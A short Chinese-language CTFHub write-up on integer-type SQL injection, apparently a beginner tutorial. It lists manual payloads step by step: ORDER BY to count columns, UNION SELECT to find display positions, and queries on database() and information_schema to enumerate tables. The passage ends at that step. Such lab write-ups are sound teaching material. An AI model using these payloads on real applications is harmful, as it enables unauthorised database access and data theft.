CTFHub_SQL整数型注入(超详解)
相信这个过程会帮助你理解sql注入!
首先打开环境
先尝试手注,已经说明是整数型,就直接查看字段数:
1 order by 1#
1 order by 2#
1 order by 3#
发现在第三步的时候没有回显,说明字段数是2。
接着判断显示位:
-1 union select 1,2#
然后查看数据库:
-1 union select database(),2#
接着获取sqli数据库中的表:
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#